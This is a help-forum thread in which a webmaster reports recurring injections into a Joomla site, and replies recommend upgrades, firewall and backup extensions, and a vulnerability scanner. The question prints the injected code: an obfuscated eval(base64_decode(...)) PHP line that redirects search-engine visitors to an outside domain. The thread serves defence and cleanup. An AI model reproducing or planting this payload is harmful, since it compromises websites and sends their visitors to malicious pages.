• Status: Solved
  • Priority: Medium
  • Security: Public
  • Views: 1051
  • Last Modified:

Joomla Exploit

We are being attacked weekly with the same code.

Added to the changelog, configuration, credits, license, index php files is the code (after the <?php>

I remove the code when i see the files have been modified which seems to be weekly... but they return.  

The code added is attached.

I know a resolution would be to upgrade to 1.7 Joomla but am hoping to find a more expedient and less costly for my client.
<?php	                                       	eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOwokcWF6cGxtPWhlYWRlcnNfc2VudCgpOwppZiAoISRxYXpwbG0pewokcmVmZXJlcj0kX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ107CiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOwppZiAoJHVhZykgewppZiAoc3RyaXN0cigkcmVmZXJlciwieWFuZGV4Iikgb3Igc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb29nbGUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwicmFtYmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImdvZ28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpb3Igc3RyaXN0cigkcmVmZXJlciwiYXBvcnQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJuaWdtYSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiYWlkdS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJkb3VibGVjbGljay5uZXQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiZWd1bi5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInN0dW1ibGV1cG9uLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpdC5seSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInRpbnl1cmwuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiY2xpY2tiYW5rLm5ldCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJsb2dzcG90LmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm15c3BhY2UuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2suY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYW9sLmNvbSIpKSB7CmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7CmhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9wcnNuYnJrLm9zYS5wbC8iKTsKCWV4aXQoKTsKCX0KfQp9Cgl9"));

Open in new window

0
bborner
Asked:
bborner
2 Solutions
 
Andrew DerseIT ManagerCommented:
Well for starters you should at least upgrade to Joomla 1.5.23.  Joomla 1.5.6 is much less secure than that.

Please let me know if you need help in finding the upgrade files.

Also, please check into RS Firewall, it does cost a little bit of $$, but it WILL help you in your fight against the hackers.

Main goal though is to get upgraded to 1.5.23 first.
0
 
Andrew DerseIT ManagerCommented:
Here's a link for RS Firewall:
http://www.rsjoomla.com/joomla-extensions/joomla-security.html

And a link for the 1.5.23 upgrade from your version:
http://joomlacode.org/gf/project/joomla/frs/?action=FrsReleaseBrowse&frs_package_id=5848

*Also make sure you backup your website on a regular basis.  Akeeba Backup will assist with that.
http://extensions.joomla.org/extensions/access-a-security/site-security/backup/1606

Please let me know if you need any additional help.
0
 
bbornerAuthor Commented:
Great advice ... will take it one step at a time starting with akeeba.
Will get back to you with progress.
Thanks
0
Improved Protection from Phishing Attacks

WatchGuard DNSWatch reduces malware infections by detecting and blocking malicious DNS requests, improving your ability to protect employees from phishing attacks. Learn more about our newest service included in Total Security Suite today!

 
Andrew DerseIT ManagerCommented:
Sounds good.
0
 
Russell_VenableCommented:
Can't tell you what there using as the code you posted got edited by the moderators, it seems atleast.
0
 
Russell_VenableCommented:
You can scan your website using the joomla vulnerability scanner which is made by yehs, which is a ethical hacker group dedicated in finding and patching these vulnerability's. So credentials are valid and trustable.

You can download it from owsap or there own site both links are on this page. https://www.owasp.org/index.php/Category:OWASP_Joomla_Vulnerability_Scanner_Project

Atleat this will give you a idea of what fixes you need to look out for ad what php file is giving the problem.


0
 
Allan NisbetOwner at Storm IT Solutions LTDCommented:
Yeah the code seems edited so i cant see where they are attacking

Feel free to email me the code via the contact form on our profile site

Should be fairly easy to block this, we had one similar through com_properties that looks like a similar exploit

also get Admin Tools as it adds lots of features to the site for security protection

Storm
0
Question has a verified solution.

Are you are experiencing a similar issue? Get a personalized answer when you ask a related question.

Have a better answer? Share it in a comment.

Join & Write a Comment

Featured Post

Cloud Class® Course: Amazon Web Services - Basic

Are you thinking about creating an Amazon Web Services account for your business? Not sure where to start? In this course you’ll get an overview of the history of AWS and take a tour of their user interface.

Tackle projects and never again get stuck behind a technical roadblock.
Join Now